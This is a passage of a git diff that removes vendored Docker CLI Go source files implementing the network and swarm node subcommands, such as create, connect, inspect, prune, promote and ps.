newDisconnectCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newRemoveCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/network/connect.go b/vendor/github.com/docker/docker/cli/command/network/connect.go deleted file mode 100644 index c4b676e5f1..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/connect.go +++ /dev/null @@ -1,64 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/network" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type connectOptions struct { - network string - container string - ipaddress string - ipv6address string - links opts.ListOpts - aliases []string - linklocalips []string -} - -func newConnectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := connectOptions{ - links: opts.NewListOpts(runconfigopts.ValidateLink), - } - - cmd := &cobra.Command{ - Use: "connect [OPTIONS] NETWORK CONTAINER", - Short: "Connect a container to a network", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.network = args[0] - opts.container = args[1] - return runConnect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVar(&opts.ipaddress, "ip", "", "IP Address") - flags.StringVar(&opts.ipv6address, "ip6", "", "IPv6 Address") - flags.Var(&opts.links, "link", "Add link to another container") - flags.StringSliceVar(&opts.aliases, "alias", []string{}, "Add network-scoped alias for the container") - flags.StringSliceVar(&opts.linklocalips, "link-local-ip", []string{}, "Add a link-local address for the container") - - return cmd -} - -func runConnect(dockerCli *command.DockerCli, opts connectOptions) error { - client := dockerCli.Client() - - epConfig := &network.EndpointSettings{ - IPAMConfig: &network.EndpointIPAMConfig{ - IPv4Address: opts.ipaddress, - IPv6Address: opts.ipv6address, - LinkLocalIPs: opts.linklocalips, - }, - Links: opts.links.GetAll(), - Aliases: opts.aliases, - } - - return client.NetworkConnect(context.Background(), opts.network, opts.container, epConfig) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/create.go b/vendor/github.com/docker/docker/cli/command/network/create.go deleted file mode 100644 index abc494e1e0..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/create.go +++ /dev/null @@ -1,226 +0,0 @@ -package network - -import ( - "fmt" - "net" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/network" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type createOptions struct { - name string - driver string - driverOpts opts.MapOpts - labels opts.ListOpts - internal bool - ipv6 bool - attachable bool - - ipamDriver string - ipamSubnet []string - ipamIPRange []string - ipamGateway []string - ipamAux opts.MapOpts - ipamOpt opts.MapOpts -} - -func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := createOptions{ - driverOpts: *opts.NewMapOpts(nil, nil), - labels: opts.NewListOpts(runconfigopts.ValidateEnv), - ipamAux: *opts.NewMapOpts(nil, nil), - ipamOpt: *opts.NewMapOpts(nil, nil), - } - - cmd := &cobra.Command{ - Use: "create [OPTIONS] NETWORK", - Short: "Create a network", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.name = args[0] - return runCreate(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.driver, "driver", "d", "bridge", "Driver to manage the Network") - flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options") - flags.Var(&opts.labels, "label", "Set metadata on a network") - flags.BoolVar(&opts.internal, "internal", false, "Restrict external access to the network") - flags.BoolVar(&opts.ipv6, "ipv6", false, "Enable IPv6 networking") - flags.BoolVar(&opts.attachable, "attachable", false, "Enable manual container attachment") - - flags.StringVar(&opts.ipamDriver, "ipam-driver", "default", "IP Address Management Driver") - flags.StringSliceVar(&opts.ipamSubnet, "subnet", []string{}, "Subnet in CIDR format that represents a network segment") - flags.StringSliceVar(&opts.ipamIPRange, "ip-range", []string{}, "Allocate container ip from a sub-range") - flags.StringSliceVar(&opts.ipamGateway, "gateway", []string{}, "IPv4 or IPv6 Gateway for the master subnet") - - flags.Var(&opts.ipamAux, "aux-address", "Auxiliary IPv4 or IPv6 addresses used by Network driver") - flags.Var(&opts.ipamOpt, "ipam-opt", "Set IPAM driver specific options") - - return cmd -} - -func runCreate(dockerCli *command.DockerCli, opts createOptions) error { - client := dockerCli.Client() - - ipamCfg, err := consolidateIpam(opts.ipamSubnet, opts.ipamIPRange, opts.ipamGateway, opts.ipamAux.GetAll()) - if err != nil { - return err - } - - // Construct network create request body - nc := types.NetworkCreate{ - Driver: opts.driver, - Options: opts.driverOpts.GetAll(), - IPAM: &network.IPAM{ - Driver: opts.ipamDriver, - Config: ipamCfg, - Options: opts.ipamOpt.GetAll(), - }, - CheckDuplicate: true, - Internal: opts.internal, - EnableIPv6: opts.ipv6, - Attachable: opts.attachable, - Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), - } - - resp, err := client.NetworkCreate(context.Background(), opts.name, nc) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "%s\n", resp.ID) - return nil -} - -// Consolidates the ipam configuration as a group from different related configurations -// user can configure network with multiple non-overlapping subnets and hence it is -// possible to correlate the various related parameters and consolidate them. -// consoidateIpam consolidates subnets, ip-ranges, gateways and auxiliary addresses into -// structured ipam data. -func consolidateIpam(subnets, ranges, gateways []string, auxaddrs map[string]string) ([]network.IPAMConfig, error) { - if len(subnets) < len(ranges) || len(subnets) < len(gateways) { - return nil, fmt.Errorf("every ip-range or gateway must have a corresponding subnet") - } - iData := map[string]*network.IPAMConfig{} - - // Populate non-overlapping subnets into consolidation map - for _, s := range subnets { - for k := range iData { - ok1, err := subnetMatches(s, k) - if err != nil { - return nil, err - } - ok2, err := subnetMatches(k, s) - if err != nil { - return nil, err - } - if ok1 || ok2 { - return nil, fmt.Errorf("multiple overlapping subnet configuration is not supported") - } - } - iData[s] = &network.IPAMConfig{Subnet: s, AuxAddress: map[string]string{}} - } - - // Validate and add valid ip ranges - for _, r := range ranges { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, r) - if err != nil { - return nil, err - } - if !ok { - continue - } - if iData[s].IPRange != "" { - return nil, fmt.Errorf("cannot configure multiple ranges (%s, %s) on the same subnet (%s)", r, iData[s].IPRange, s) - } - d := iData[s] - d.IPRange = r - match = true - } - if !match { - return nil, fmt.Errorf("no matching subnet for range %s", r) - } - } - - // Validate and add valid gateways - for _, g := range gateways { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, g) - if err != nil { - return nil, err - } - if !ok { - continue - } - if iData[s].Gateway != "" { - return nil, fmt.Errorf("cannot configure multiple gateways (%s, %s) for the same subnet (%s)", g, iData[s].Gateway, s) - } - d := iData[s] - d.Gateway = g - match = true - } - if !match { - return nil, fmt.Errorf("no matching subnet for gateway %s", g) - } - } - - // Validate and add aux-addresses - for key, aa := range auxaddrs { - match := false - for _, s := range subnets { - ok, err := subnetMatches(s, aa) - if err != nil { - return nil, err - } - if !ok { - continue - } - iData[s].AuxAddress[key] = aa - match = true - } - if !match { - return nil, fmt.Errorf("no matching subnet for aux-address %s", aa) - } - } - - idl := []network.IPAMConfig{} - for _, v := range iData { - idl = append(idl, *v) - } - return idl, nil -} - -func subnetMatches(subnet, data string) (bool, error) { - var ( - ip net.IP - ) - - _, s, err := net.ParseCIDR(subnet) - if err != nil { - return false, fmt.Errorf("Invalid subnet %s : %v", s, err) - } - - if strings.Contains(data, "/") { - ip, _, err = net.ParseCIDR(data) - if err != nil { - return false, fmt.Errorf("Invalid cidr %s : %v", data, err) - } - } else { - ip = net.ParseIP(data) - } - - return s.Contains(ip), nil -} diff --git a/vendor/github.com/docker/docker/cli/command/network/disconnect.go b/vendor/github.com/docker/docker/cli/command/network/disconnect.go deleted file mode 100644 index c9d9c14a13..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/disconnect.go +++ /dev/null @@ -1,41 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type disconnectOptions struct { - network string - container string - force bool -} - -func newDisconnectCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := disconnectOptions{} - - cmd := &cobra.Command{ - Use: "disconnect [OPTIONS] NETWORK CONTAINER", - Short: "Disconnect a container from a network", - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.network = args[0] - opts.container = args[1] - return runDisconnect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Force the container to disconnect from a network") - - return cmd -} - -func runDisconnect(dockerCli *command.DockerCli, opts disconnectOptions) error { - client := dockerCli.Client() - - return client.NetworkDisconnect(context.Background(), opts.network, opts.container, opts.force) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/inspect.go b/vendor/github.com/docker/docker/cli/command/network/inspect.go deleted file mode 100644 index 1a86855f71..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/inspect.go +++ /dev/null @@ -1,45 +0,0 @@ -package network - -import ( - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/spf13/cobra" -) - -type inspectOptions struct { - format string - names []string -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] NETWORK [NETWORK...]", - Short: "Display detailed information on one or more networks", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.names = args - return runInspect(dockerCli, opts) - }, - } - - cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - - ctx := context.Background() - - getNetFunc := func(name string) (interface{}, []byte, error) { - return client.NetworkInspectWithRaw(ctx, name) - } - - return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getNetFunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/list.go b/vendor/github.com/docker/docker/cli/command/network/list.go deleted file mode 100644 index 1a5d285103..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/list.go +++ /dev/null @@ -1,76 +0,0 @@ -package network - -import ( - "sort" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/formatter" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type byNetworkName []types.NetworkResource - -func (r byNetworkName) Len() int { return len(r) } -func (r byNetworkName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byNetworkName) Less(i, j int) bool { return r[i].Name < r[j].Name } - -type listOptions struct { - quiet bool - noTrunc bool - format string - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List networks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display network IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate the output") - flags.StringVar(&opts.format, "format", "", "Pretty-print networks using a Go template") - flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'driver=bridge')") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - options := types.NetworkListOptions{Filters: opts.filter.Value()} - networkResources, err := client.NetworkList(context.Background(), options) - if err != nil { - return err - } - - format := opts.format - if len(format) == 0 { - if len(dockerCli.ConfigFile().NetworksFormat) > 0 && !opts.quiet { - format = dockerCli.ConfigFile().NetworksFormat - } else { - format = formatter.TableFormatKey - } - } - - sort.Sort(byNetworkName(networkResources)) - - networksCtx := formatter.Context{ - Output: dockerCli.Out(), - Format: formatter.NewNetworkFormat(format, opts.quiet), - Trunc: !opts.noTrunc, - } - return formatter.NetworkWrite(networksCtx, networkResources) -} diff --git a/vendor/github.com/docker/docker/cli/command/network/prune.go b/vendor/github.com/docker/docker/cli/command/network/prune.go deleted file mode 100644 index 9f1979e6b5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/prune.go +++ /dev/null @@ -1,73 +0,0 @@ -package network - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type pruneOptions struct { - force bool -} - -// NewPruneCommand returns a new cobra prune command for networks -func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts pruneOptions - - cmd := &cobra.Command{ - Use: "prune [OPTIONS]", - Short: "Remove all unused networks", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - output, err := runPrune(dockerCli, opts) - if err != nil { - return err - } - if output != "" { - fmt.Fprintln(dockerCli.Out(), output) - } - return nil - }, - Tags: map[string]string{"version": "1.25"}, - } - - flags := cmd.Flags() - flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") - - return cmd -} - -const warning = `WARNING! This will remove all networks not used by at least one container. -Are you sure you want to continue?` - -func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (output string, err error) { - if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { - return - } - - report, err := dockerCli.Client().NetworksPrune(context.Background(), filters.Args{}) - if err != nil { - return - } - - if len(report.NetworksDeleted) > 0 { - output = "Deleted Networks:\n" - for _, id := range report.NetworksDeleted { - output += id + "\n" - } - } - - return -} - -// RunPrune calls the Network Prune API -// This returns the amount of space reclaimed and a detailed output string -func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { - output, err := runPrune(dockerCli, pruneOptions{force: true}) - return 0, output, err -} diff --git a/vendor/github.com/docker/docker/cli/command/network/remove.go b/vendor/github.com/docker/docker/cli/command/network/remove.go deleted file mode 100644 index 2034b8709e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/network/remove.go +++ /dev/null @@ -1,43 +0,0 @@ -package network - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "rm NETWORK [NETWORK...]", - Aliases: []string{"remove"}, - Short: "Remove one or more networks", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args) - }, - } -} - -func runRemove(dockerCli *command.DockerCli, networks []string) error { - client := dockerCli.Client() - ctx := context.Background() - status := 0 - - for _, name := range networks { - if err := client.NetworkRemove(ctx, name); err != nil { - fmt.Fprintf(dockerCli.Err(), "%s\n", err) - status = 1 - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", name) - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/cmd.go b/vendor/github.com/docker/docker/cli/command/node/cmd.go deleted file mode 100644 index e71b9199ad..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/cmd.go +++ /dev/null @@ -1,43 +0,0 @@ -package node - -import ( - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - apiclient "github.com/docker/docker/client" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -// NewNodeCommand returns a cobra command for `node` subcommands -func NewNodeCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "node", - Short: "Manage Swarm nodes", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - newDemoteCommand(dockerCli), - newInspectCommand(dockerCli), - newListCommand(dockerCli), - newPromoteCommand(dockerCli), - newRemoveCommand(dockerCli), - newPsCommand(dockerCli), - newUpdateCommand(dockerCli), - ) - return cmd -} - -// Reference returns the reference of a node. The special value "self" for a node -// reference is mapped to the current node, hence the node ID is retrieved using -// the `/info` endpoint. -func Reference(ctx context.Context, client apiclient.APIClient, ref string) (string, error) { - if ref == "self" { - info, err := client.Info(ctx) - if err != nil { - return "", err - } - return info.Swarm.NodeID, nil - } - return ref, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/demote.go b/vendor/github.com/docker/docker/cli/command/node/demote.go deleted file mode 100644 index 33f86c6499..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/demote.go +++ /dev/null @@ -1,36 +0,0 @@ -package node - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newDemoteCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "demote NODE [NODE...]", - Short: "Demote one or more nodes from manager in the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runDemote(dockerCli, args) - }, - } -} - -func runDemote(dockerCli *command.DockerCli, nodes []string) error { - demote := func(node *swarm.Node) error { - if node.Spec.Role == swarm.NodeRoleWorker { - fmt.Fprintf(dockerCli.Out(), "Node %s is already a worker.\n", node.ID) - return errNoRoleChange - } - node.Spec.Role = swarm.NodeRoleWorker - return nil - } - success := func(nodeID string) { - fmt.Fprintf(dockerCli.Out(), "Manager %s demoted in the swarm.\n", nodeID) - } - return updateNodes(dockerCli, nodes, demote, success) -} diff --git a/vendor/github.com/docker/docker/cli/command/node/inspect.go b/vendor/github.com/docker/docker/cli/command/node/inspect.go deleted file mode 100644 index fde70185f8..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/inspect.go +++ /dev/null @@ -1,144 +0,0 @@ -package node - -import ( - "fmt" - "io" - "sort" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/inspect" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/go-units" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type inspectOptions struct { - nodeIds []string - format string - pretty bool -} - -func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts inspectOptions - - cmd := &cobra.Command{ - Use: "inspect [OPTIONS] self|NODE [NODE...]", - Short: "Display detailed information on one or more nodes", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.nodeIds = args - return runInspect(dockerCli, opts) - }, - } - - flags := cmd.Flags() - flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") - flags.BoolVar(&opts.pretty, "pretty", false, "Print the information in a human friendly format.") - return cmd -} - -func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { - client := dockerCli.Client() - ctx := context.Background() - getRef := func(ref string) (interface{}, []byte, error) { - nodeRef, err := Reference(ctx, client, ref) - if err != nil { - return nil, nil, err - } - node, _, err := client.NodeInspectWithRaw(ctx, nodeRef) - return node, nil, err - } - - if !opts.pretty { - return inspect.Inspect(dockerCli.Out(), opts.nodeIds, opts.format, getRef) - } - return printHumanFriendly(dockerCli.Out(), opts.nodeIds, getRef) -} - -func printHumanFriendly(out io.Writer, refs []string, getRef inspect.GetRefFunc) error { - for idx, ref := range refs { - obj, _, err := getRef(ref) - if err != nil { - return err - } - printNode(out, obj.(swarm.Node)) - - // TODO: better way to do this? - // print extra space between objects, but not after the last one - if idx+1 != len(refs) { - fmt.Fprintf(out, "\n\n") - } else { - fmt.Fprintf(out, "\n") - } - } - return nil -} - -// TODO: use a template -func printNode(out io.Writer, node swarm.Node) { - fmt.Fprintf(out, "ID:\t\t\t%s\n", node.ID) - ioutils.FprintfIfNotEmpty(out, "Name:\t\t\t%s\n", node.Spec.Name) - if node.Spec.Labels != nil { - fmt.Fprintln(out, "Labels:") - for k, v := range node.Spec.Labels { - fmt.Fprintf(out, " - %s = %s\n", k, v) - } - } - - ioutils.FprintfIfNotEmpty(out, "Hostname:\t\t%s\n", node.Description.Hostname) - fmt.Fprintf(out, "Joined at:\t\t%s\n", command.PrettyPrint(node.CreatedAt)) - fmt.Fprintln(out, "Status:") - fmt.Fprintf(out, " State:\t\t\t%s\n", command.PrettyPrint(node.Status.State)) - ioutils.FprintfIfNotEmpty(out, " Message:\t\t%s\n", command.PrettyPrint(node.Status.Message)) - fmt.Fprintf(out, " Availability:\t\t%s\n", command.PrettyPrint(node.Spec.Availability)) - ioutils.FprintfIfNotEmpty(out, " Address:\t\t%s\n", command.PrettyPrint(node.Status.Addr)) - - if node.ManagerStatus != nil { - fmt.Fprintln(out, "Manager Status:") - fmt.Fprintf(out, " Address:\t\t%s\n", node.ManagerStatus.Addr) - fmt.Fprintf(out, " Raft Status:\t\t%s\n", command.PrettyPrint(node.ManagerStatus.Reachability)) - leader := "No" - if node.ManagerStatus.Leader { - leader = "Yes" - } - fmt.Fprintf(out, " Leader:\t\t%s\n", leader) - } - - fmt.Fprintln(out, "Platform:") - fmt.Fprintf(out, " Operating System:\t%s\n", node.Description.Platform.OS) - fmt.Fprintf(out, " Architecture:\t\t%s\n", node.Description.Platform.Architecture) - - fmt.Fprintln(out, "Resources:") - fmt.Fprintf(out, " CPUs:\t\t\t%d\n", node.Description.Resources.NanoCPUs/1e9) - fmt.Fprintf(out, " Memory:\t\t%s\n", units.BytesSize(float64(node.Description.Resources.MemoryBytes))) - - var pluginTypes []string - pluginNamesByType := map[string][]string{} - for _, p := range node.Description.Engine.Plugins { - // append to pluginTypes only if not done previously - if _, ok := pluginNamesByType[p.Type]; !ok { - pluginTypes = append(pluginTypes, p.Type) - } - pluginNamesByType[p.Type] = append(pluginNamesByType[p.Type], p.Name) - } - - if len(pluginTypes) > 0 { - fmt.Fprintln(out, "Plugins:") - sort.Strings(pluginTypes) // ensure stable output - for _, pluginType := range pluginTypes { - fmt.Fprintf(out, " %s:\t\t%s\n", pluginType, strings.Join(pluginNamesByType[pluginType], ", ")) - } - } - fmt.Fprintf(out, "Engine Version:\t\t%s\n", node.Description.Engine.EngineVersion) - - if len(node.Description.Engine.Labels) != 0 { - fmt.Fprintln(out, "Engine Labels:") - for k, v := range node.Description.Engine.Labels { - fmt.Fprintf(out, " - %s = %s\n", k, v) - } - } -} diff --git a/vendor/github.com/docker/docker/cli/command/node/list.go b/vendor/github.com/docker/docker/cli/command/node/list.go deleted file mode 100644 index 9cacdcf441..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/list.go +++ /dev/null @@ -1,115 +0,0 @@ -package node - -import ( - "fmt" - "io" - "text/tabwriter" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -const ( - listItemFmt = "%s\t%s\t%s\t%s\t%s\n" -) - -type listOptions struct { - quiet bool - filter opts.FilterOpt -} - -func newListCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := listOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ls [OPTIONS]", - Aliases: []string{"list"}, - Short: "List nodes in the swarm", - Args: cli.NoArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runList(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runList(dockerCli *command.DockerCli, opts listOptions) error { - client := dockerCli.Client() - out := dockerCli.Out() - ctx := context.Background() - - nodes, err := client.NodeList( - ctx, - types.NodeListOptions{Filters: opts.filter.Value()}) - if err != nil { - return err - } - - if len(nodes) > 0 && !opts.quiet { - // only non-empty nodes and not quiet, should we call /info api - info, err := client.Info(ctx) - if err != nil { - return err - } - printTable(out, nodes, info) - } else if !opts.quiet { - // no nodes and not quiet, print only one line with columns ID, HOSTNAME, ... - printTable(out, nodes, types.Info{}) - } else { - printQuiet(out, nodes) - } - - return nil -} - -func printTable(out io.Writer, nodes []swarm.Node, info types.Info) { - writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) - - // Ignore flushing errors - defer writer.Flush() - - fmt.Fprintf(writer, listItemFmt, "ID", "HOSTNAME", "STATUS", "AVAILABILITY", "MANAGER STATUS") - for _, node := range nodes { - name := node.Description.Hostname - availability := string(node.Spec.Availability) - - reachability := "" - if node.ManagerStatus != nil { - if node.ManagerStatus.Leader { - reachability = "Leader" - } else { - reachability = string(node.ManagerStatus.Reachability) - } - } - - ID := node.ID - if node.ID == info.Swarm.NodeID { - ID = ID + " *" - } - - fmt.Fprintf( - writer, - listItemFmt, - ID, - name, - command.PrettyPrint(string(node.Status.State)), - command.PrettyPrint(availability), - command.PrettyPrint(reachability)) - } -} - -func printQuiet(out io.Writer, nodes []swarm.Node) { - for _, node := range nodes { - fmt.Fprintln(out, node.ID) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/node/opts.go b/vendor/github.com/docker/docker/cli/command/node/opts.go deleted file mode 100644 index 7e6c55d487..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/opts.go +++ /dev/null @@ -1,60 +0,0 @@ -package node - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" -) - -type nodeOptions struct { - annotations - role string - availability string -} - -type annotations struct { - name string - labels opts.ListOpts -} - -func newNodeOptions() *nodeOptions { - return &nodeOptions{ - annotations: annotations{ - labels: opts.NewListOpts(nil), - }, - } -} - -func (opts *nodeOptions) ToNodeSpec() (swarm.NodeSpec, error) { - var spec swarm.NodeSpec - - spec.Annotations.Name = opts.annotations.name - spec.Annotations.Labels = runconfigopts.ConvertKVStringsToMap(opts.annotations.labels.GetAll()) - - switch swarm.NodeRole(strings.ToLower(opts.role)) { - case swarm.NodeRoleWorker: - spec.Role = swarm.NodeRoleWorker - case swarm.NodeRoleManager: - spec.Role = swarm.NodeRoleManager - case "": - default: - return swarm.NodeSpec{}, fmt.Errorf("invalid role %q, only worker and manager are supported", opts.role) - } - - switch swarm.NodeAvailability(strings.ToLower(opts.availability)) { - case swarm.NodeAvailabilityActive: - spec.Availability = swarm.NodeAvailabilityActive - case swarm.NodeAvailabilityPause: - spec.Availability = swarm.NodeAvailabilityPause - case swarm.NodeAvailabilityDrain: - spec.Availability = swarm.NodeAvailabilityDrain - case "": - default: - return swarm.NodeSpec{}, fmt.Errorf("invalid availability %q, only active, pause and drain are supported", opts.availability) - } - - return spec, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/node/promote.go b/vendor/github.com/docker/docker/cli/command/node/promote.go deleted file mode 100644 index f47d783f4c..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/promote.go +++ /dev/null @@ -1,36 +0,0 @@ -package node - -import ( - "fmt" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newPromoteCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "promote NODE [NODE...]", - Short: "Promote one or more nodes to manager in the swarm", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runPromote(dockerCli, args) - }, - } -} - -func runPromote(dockerCli *command.DockerCli, nodes []string) error { - promote := func(node *swarm.Node) error { - if node.Spec.Role == swarm.NodeRoleManager { - fmt.Fprintf(dockerCli.Out(), "Node %s is already a manager.\n", node.ID) - return errNoRoleChange - } - node.Spec.Role = swarm.NodeRoleManager - return nil - } - success := func(nodeID string) { - fmt.Fprintf(dockerCli.Out(), "Node %s promoted to a manager in the swarm.\n", nodeID) - } - return updateNodes(dockerCli, nodes, promote, success) -} diff --git a/vendor/github.com/docker/docker/cli/command/node/ps.go b/vendor/github.com/docker/docker/cli/command/node/ps.go deleted file mode 100644 index a034721d24..0000000000 --- a/vendor/github.com/docker/docker/cli/command/node/ps.go +++ /dev/null @@ -1,93 +0,0 @@ -package node - -import ( - "fmt" - "strings" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/idresolver" - "github.com/docker/docker/cli/command/task" - "github.com/docker/docker/opts" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -type psOptions struct { - nodeIDs []string - noResolve bool - noTrunc bool - filter opts.FilterOpt -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] [NODE...]", - Short: "List tasks running on one or more nodes, defaults to current node", - Args: cli.RequiresMinArgs(0), - RunE: func(cmd *cobra.Command, args []string) error { - opts.nodeIDs = []string{"self"} - - if len(args) != 0 { - opts.nodeIDs = args - } - - return runPs(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPs(dockerCli *command.DockerCli, opts psOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - var ( - errs []string - tasks []swarm.Task - ) - - for _, nodeID := range opts.nodeIDs { - nodeRef, err := 